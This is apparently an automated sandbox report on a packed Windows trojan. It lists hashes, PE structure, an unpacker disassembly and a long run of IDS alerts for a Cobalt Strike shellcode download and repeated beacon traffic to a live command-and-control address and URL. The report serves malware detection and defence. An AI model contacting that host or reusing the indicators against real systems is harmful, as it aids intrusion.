              http://47.121.190.121:81/dot.gif12k2vUsu5VZ5.exe, 00000000.00000003.2577565149.0000000000801000.00000004.00000020.00020000.00000000.sdmp, k2vUsu5VZ5.exe, 00000000.00000003.2360519189.000000000080B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              47.121.190.121
              		unknownChina
              		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue

              General Information

              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1586891
              Start date and time:2025-01-09 18:26:05 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 52s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:k2vUsu5VZ5.exe
              renamed because original name is a hash value
              Original Sample Name:591c92301d93d233f0ab70817db96afd.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@0/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 17
              • Number of non-executed functions: 140
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: k2vUsu5VZ5.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              12:26:54API Interceptor15895420x Sleep call for process: k2vUsu5VZ5.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdFantazy.spc.elfGet hashmaliciousUnknownBrowse
              • 8.167.197.133
              sora.mpsl.elfGet hashmaliciousUnknownBrowse
              • 8.182.192.34
              sora.m68k.elfGet hashmaliciousUnknownBrowse
              • 47.116.180.218
              sora.arm.elfGet hashmaliciousUnknownBrowse
              • 223.6.159.231
              Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
              • 203.119.157.14
              arm.elfGet hashmaliciousMiraiBrowse
              • 8.145.236.38
              arm7.elfGet hashmaliciousMiraiBrowse
              • 8.159.149.205
              ppc.elfGet hashmaliciousMiraiBrowse
              • 8.168.165.33
              spc.elfGet hashmaliciousMiraiBrowse
              • 8.162.167.206
              sh4.elfGet hashmaliciousMiraiBrowse
              • 8.191.194.91

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):7.482506469989575
              TrID:
              • UPX compressed Win32 Executable (30571/9) 65.57%
              • Win64 Executable (generic) (12005/4) 25.75%
              • Generic Win/DOS Executable (2004/3) 4.30%
              • DOS Executable Generic (2002/1) 4.29%
              • VXD Driver (31/22) 0.07%
              File name:k2vUsu5VZ5.exe
              File size:9'728 bytes
              MD5:591c92301d93d233f0ab70817db96afd
              SHA1:4294d763f3c0a84235627893f1b377632e7a3ef6
              SHA256:18c3b8d894afcee5e215753507d812be492fec2d7bcde4a9b2c461fa60b63464
              SHA512:0b9c19f954f0218faa2452c63d82c7682674e4b38d649b1db4de84f4eebf66d289ecc85f4ca32ccb8ac3654e0c20d3cd147f0c3503250365e2d37783ac899d79
              SSDEEP:192:ZRqd3PcxUjboojUf43iaK5PY7ZPjEo2ppV/VWUQ6iE4GdJ9wqWkS:KbjboojQXQ7B/2ppBVqPUJzS
              TLSH:F1129FDF518548EEC4898434EBFD64985CFF3C580B562F66DED203BFAA282792554420
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./....".0.......... .........@............................................... ............................

              File Icon

              Icon Hash:90cececece8e8eb0

              Static PE Info

              General

              Entrypoint:0x40df20
              Entrypoint Section:UPX1
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:0x40e14a
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:9aebf3da4677af9275c461261e5abde3

              Entrypoint Preview

              Instruction
              push ebx
              push esi
              push edi
              push ebp
              dec eax
              lea esi, dword ptr [FFFFE0FAh]
              dec eax
              lea edi, dword ptr [esi-0000B025h]
              push edi
              xor ebx, ebx
              xor ecx, ecx
              dec eax
              or ebp, FFFFFFFFh
              call 00007F1D58F130B5h
              add ebx, ebx
              je 00007F1D58F13064h
              rep ret
              mov ebx, dword ptr [esi]
              dec eax
              sub esi, FFFFFFFCh
              adc ebx, ebx
              mov dl, byte ptr [esi]
              rep ret
              dec eax
              lea eax, dword ptr [edi+ebp]
              cmp ecx, 05h
              mov dl, byte ptr [eax]
              jbe 00007F1D58F13083h
              dec eax
              cmp ebp, FFFFFFFCh
              jnbe 00007F1D58F1307Dh
              sub ecx, 04h
              mov edx, dword ptr [eax]
              dec eax
              add eax, 04h
              sub ecx, 04h
              mov dword ptr [edi], edx
              dec eax
              lea edi, dword ptr [edi+04h]
              jnc 00007F1D58F13051h
              add ecx, 04h
              mov dl, byte ptr [eax]
              je 00007F1D58F13072h
              dec eax
              inc eax
              mov byte ptr [edi], dl
              sub ecx, 01h
              mov dl, byte ptr [eax]
              dec eax
              lea edi, dword ptr [edi+01h]
              jne 00007F1D58F13052h
              rep ret
              cld
              inc ecx
              pop ebx
              jmp 00007F1D58F1306Ah
              dec eax
              inc esi
              mov byte ptr [edi], dl
              dec eax
              inc edi
              mov dl, byte ptr [esi]
              add ebx, ebx
              jne 00007F1D58F1306Ch
              mov ebx, dword ptr [esi]
              dec eax
              sub esi, FFFFFFFCh
              adc ebx, ebx
              mov dl, byte ptr [esi]
              jc 00007F1D58F13048h
              lea eax, dword ptr [ecx+01h]
              inc ecx
              call ebx
              adc eax, eax
              add ebx, ebx
              jne 00007F1D58F1306Ch
              mov ebx, dword ptr [esi]
              dec eax
              sub esi, FFFFFFFCh
              adc ebx, ebx
              mov dl, byte ptr [esi]
              jnc 00007F1D58F1304Dh
              sub eax, 03h
              jc 00007F1D58F13075h
              shl eax, 08h
              movzx edx, dl
              or eax, edx
              dec eax
              inc esi
              xor eax, FFFFFFFFh
              je 00007F1D58F1309Ch
              dec eax
              arpl ax, bp
              lea eax, dword ptr [ecx+01h]
              inc ecx
              call ebx
              adc ecx, ecx

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xf0000xd0UPX2
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x60000x2b8UPX0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0xe1700x28UPX1
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              UPX00x10000xb0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              UPX10xc0000x30000x2200efdfa9814f4e88093af0979672c2add4False0.9702435661764706data7.798367281213769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              UPX20xf0000x10000x200922c9b618a0dc7bae26c062b86d2ed87False0.248046875data1.575165572176159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

              Imports

              DLLImport
              KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
              msvcrt.dllexit

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2025-01-09T18:26:57.140796+01002035442ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1147.121.190.12181192.168.2.449730TCP
              2025-01-09T18:26:58.692172+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973147.121.190.12181TCP
              2025-01-09T18:26:59.801721+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973247.121.190.12181TCP
              2025-01-09T18:27:00.855914+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973347.121.190.12181TCP
              2025-01-09T18:27:01.997813+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973447.121.190.12181TCP
              2025-01-09T18:27:03.326121+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973547.121.190.12181TCP
              2025-01-09T18:27:04.460605+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973647.121.190.12181TCP
              2025-01-09T18:27:05.551918+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973747.121.190.12181TCP
              2025-01-09T18:27:06.645910+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973847.121.190.12181TCP
              2025-01-09T18:27:07.726797+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44973947.121.190.12181TCP
              2025-01-09T18:27:08.807204+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974047.121.190.12181TCP
              2025-01-09T18:27:09.902843+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974147.121.190.12181TCP
              2025-01-09T18:27:11.005653+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974247.121.190.12181TCP
              2025-01-09T18:27:12.090675+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974347.121.190.12181TCP
              2025-01-09T18:27:13.200363+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974647.121.190.12181TCP
              2025-01-09T18:27:14.316726+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44974947.121.190.12181TCP
              2025-01-09T18:27:15.420079+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975147.121.190.12181TCP
              2025-01-09T18:27:16.468586+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975347.121.190.12181TCP
              2025-01-09T18:27:17.793772+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975447.121.190.12181TCP
              2025-01-09T18:27:19.000349+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975547.121.190.12181TCP
              2025-01-09T18:27:20.074841+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975647.121.190.12181TCP
              2025-01-09T18:27:21.138262+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975747.121.190.12181TCP
              2025-01-09T18:27:22.209134+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975847.121.190.12181TCP
              2025-01-09T18:27:23.270108+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44975947.121.190.12181TCP
              2025-01-09T18:27:24.458531+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976047.121.190.12181TCP
              2025-01-09T18:27:25.510055+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976147.121.190.12181TCP
              2025-01-09T18:27:26.690591+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976247.121.190.12181TCP
              2025-01-09T18:27:27.760710+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976347.121.190.12181TCP
              2025-01-09T18:27:28.944820+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976447.121.190.12181TCP
              2025-01-09T18:27:30.022566+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976547.121.190.12181TCP
              2025-01-09T18:27:31.133799+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976647.121.190.12181TCP
              2025-01-09T18:27:32.193149+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976747.121.190.12181TCP
              2025-01-09T18:27:33.245394+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976847.121.190.12181TCP
              2025-01-09T18:27:34.335835+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44976947.121.190.12181TCP
              2025-01-09T18:27:35.858787+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977047.121.190.12181TCP
              2025-01-09T18:27:36.989465+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977147.121.190.12181TCP
              2025-01-09T18:27:38.061812+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977247.121.190.12181TCP
              2025-01-09T18:27:39.150378+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977347.121.190.12181TCP
              2025-01-09T18:27:40.326537+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977447.121.190.12181TCP
              2025-01-09T18:27:41.578354+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977547.121.190.12181TCP
              2025-01-09T18:27:42.676808+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977647.121.190.12181TCP
              2025-01-09T18:27:43.851699+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977747.121.190.12181TCP
              2025-01-09T18:27:45.015487+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977847.121.190.12181TCP
              2025-01-09T18:27:46.156206+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44977947.121.190.12181TCP
              2025-01-09T18:27:47.259326+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978047.121.190.12181TCP
              2025-01-09T18:27:48.475014+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978147.121.190.12181TCP
              2025-01-09T18:27:49.569382+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978247.121.190.12181TCP
              2025-01-09T18:27:50.687332+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978347.121.190.12181TCP
              2025-01-09T18:27:51.896072+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978547.121.190.12181TCP
              2025-01-09T18:27:53.001148+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978647.121.190.12181TCP
              2025-01-09T18:27:54.063851+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978747.121.190.12181TCP
              2025-01-09T18:27:55.153573+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44978947.121.190.12181TCP
              2025-01-09T18:27:56.241630+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44979547.121.190.12181TCP
              2025-01-09T18:27:57.316932+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44980147.121.190.12181TCP
              2025-01-09T18:27:58.396016+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44980747.121.190.12181TCP
              2025-01-09T18:27:59.623871+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44981847.121.190.12181TCP
              2025-01-09T18:28:00.692848+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44982447.121.190.12181TCP
              2025-01-09T18:28:01.758776+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44983047.121.190.12181TCP
              2025-01-09T18:28:02.810822+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44983747.121.190.12181TCP
              2025-01-09T18:28:03.988212+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44984147.121.190.12181TCP
              2025-01-09T18:28:05.321293+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44984947.121.190.12181TCP
              2025-01-09T18:28:06.413300+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44985647.121.190.12181TCP
              2025-01-09T18:28:07.532474+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44986347.121.190.12181TCP
              2025-01-09T18:28:08.601795+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44987347.121.190.12181TCP
              2025-01-09T18:28:09.788651+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44987947.121.190.12181TCP
              2025-01-09T18:28:10.873173+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44988647.121.190.12181TCP
              2025-01-09T18:28:11.954819+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44989347.121.190.12181TCP
              2025-01-09T18:28:13.119522+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44990247.121.190.12181TCP
              2025-01-09T18:28:14.195020+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44990947.121.190.12181TCP
              2025-01-09T18:28:15.252536+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44991647.121.190.12181TCP
              2025-01-09T18:28:16.440191+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44992647.121.190.12181TCP
              2025-01-09T18:28:17.615109+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44993247.121.190.12181TCP
              2025-01-09T18:28:18.709015+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44993947.121.190.12181TCP
              2025-01-09T18:28:19.801526+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44994847.121.190.12181TCP
              2025-01-09T18:28:20.911426+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44995547.121.190.12181TCP
              2025-01-09T18:28:22.022760+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44996347.121.190.12181TCP
              2025-01-09T18:28:23.167905+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44997147.121.190.12181TCP
              2025-01-09T18:28:24.294644+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44997847.121.190.12181TCP
              2025-01-09T18:28:25.658522+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44998847.121.190.12181TCP
              2025-01-09T18:28:27.021503+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.44999647.121.190.12181TCP
              2025-01-09T18:28:28.241166+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45000547.121.190.12181TCP
              2025-01-09T18:28:29.362326+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45001247.121.190.12181TCP
              2025-01-09T18:28:30.463976+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45002047.121.190.12181TCP
              2025-01-09T18:28:31.677591+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45002847.121.190.12181TCP
              2025-01-09T18:28:32.803069+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45003547.121.190.12181TCP
              2025-01-09T18:28:34.118497+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45004247.121.190.12181TCP
              2025-01-09T18:28:35.329669+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45005147.121.190.12181TCP
              2025-01-09T18:28:36.564411+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006047.121.190.12181TCP
              2025-01-09T18:28:37.695923+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45006847.121.190.12181TCP
              2025-01-09T18:28:38.964116+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45007647.121.190.12181TCP
              2025-01-09T18:28:40.162304+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45008347.121.190.12181TCP
              2025-01-09T18:28:41.263355+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009347.121.190.12181TCP
              2025-01-09T18:28:42.358095+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009447.121.190.12181TCP
              2025-01-09T18:28:43.525495+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009547.121.190.12181TCP
              2025-01-09T18:28:44.677076+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009647.121.190.12181TCP
              2025-01-09T18:28:45.743348+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009747.121.190.12181TCP
              2025-01-09T18:28:47.011567+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009847.121.190.12181TCP
              2025-01-09T18:28:48.148338+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45009947.121.190.12181TCP
              2025-01-09T18:28:49.318041+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010047.121.190.12181TCP
              2025-01-09T18:28:53.196032+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010147.121.190.12181TCP
              2025-01-09T18:28:54.443585+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010247.121.190.12181TCP
              2025-01-09T18:28:55.532889+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010347.121.190.12181TCP
              2025-01-09T18:28:56.750899+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010447.121.190.12181TCP
              2025-01-09T18:28:58.599679+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010547.121.190.12181TCP
              2025-01-09T18:28:59.666420+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010647.121.190.12181TCP
              2025-01-09T18:29:00.744551+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010747.121.190.12181TCP
              2025-01-09T18:29:01.823055+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010847.121.190.12181TCP
              2025-01-09T18:29:02.995926+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45010947.121.190.12181TCP
              2025-01-09T18:29:04.080078+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011047.121.190.12181TCP
              2025-01-09T18:29:05.166988+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011147.121.190.12181TCP
              2025-01-09T18:29:06.251262+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011247.121.190.12181TCP
              2025-01-09T18:29:07.331183+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011347.121.190.12181TCP
              2025-01-09T18:29:11.448450+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011447.121.190.12181TCP
              2025-01-09T18:29:12.553700+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011547.121.190.12181TCP
              2025-01-09T18:29:13.620777+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011647.121.190.12181TCP
              2025-01-09T18:29:14.720364+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011747.121.190.12181TCP
              2025-01-09T18:29:15.814631+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011847.121.190.12181TCP
              2025-01-09T18:29:16.894578+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45011947.121.190.12181TCP
              2025-01-09T18:29:18.004943+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012047.121.190.12181TCP
              2025-01-09T18:29:19.163464+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012147.121.190.12181TCP
              2025-01-09T18:29:20.243981+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012247.121.190.12181TCP
              2025-01-09T18:29:21.320990+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012347.121.190.12181TCP
              2025-01-09T18:29:22.513789+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012447.121.190.12181TCP
              2025-01-09T18:29:23.620517+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012547.121.190.12181TCP
              2025-01-09T18:29:24.674356+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012647.121.190.12181TCP
              2025-01-09T18:29:25.756463+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012747.121.190.12181TCP
              2025-01-09T18:29:26.891494+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012847.121.190.12181TCP
              2025-01-09T18:29:27.972287+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45012947.121.190.12181TCP
              2025-01-09T18:29:29.079978+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013047.121.190.12181TCP
              2025-01-09T18:29:30.159900+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013147.121.190.12181TCP
              2025-01-09T18:29:31.218459+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013247.121.190.12181TCP
              2025-01-09T18:29:32.268197+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013347.121.190.12181TCP
              2025-01-09T18:29:33.362693+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013447.121.190.12181TCP
              2025-01-09T18:29:34.426477+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013547.121.190.12181TCP
              2025-01-09T18:29:35.527009+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013647.121.190.12181TCP
              2025-01-09T18:29:36.597921+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013747.121.190.12181TCP
              2025-01-09T18:29:37.679996+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013847.121.190.12181TCP
              2025-01-09T18:29:38.792279+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45013947.121.190.12181TCP
              2025-01-09T18:29:39.875549+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014047.121.190.12181TCP
              2025-01-09T18:29:40.951468+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014147.121.190.12181TCP
              2025-01-09T18:29:42.114723+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014247.121.190.12181TCP
              2025-01-09T18:29:43.187368+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014347.121.190.12181TCP
              2025-01-09T18:29:44.313392+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014447.121.190.12181TCP
              2025-01-09T18:29:45.383729+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014547.121.190.12181TCP
              2025-01-09T18:29:46.458244+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014647.121.190.12181TCP
              2025-01-09T18:29:47.592806+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014747.121.190.12181TCP
              2025-01-09T18:29:48.720814+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014847.121.190.12181TCP
              2025-01-09T18:29:49.991351+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45014947.121.190.12181TCP
              2025-01-09T18:29:51.069004+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45015047.121.190.12181TCP
              2025-01-09T18:29:52.315201+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45015147.121.190.12181TCP
              2025-01-09T18:29:53.503849+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45015247.121.190.12181TCP
              2025-01-09T18:29:54.625500+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45015347.121.190.12181TCP
              2025-01-09T18:29:55.680921+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45015447.121.190.12181TCP
              2025-01-09T18:29:56.792110+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.45015547.121.190.12181TCP
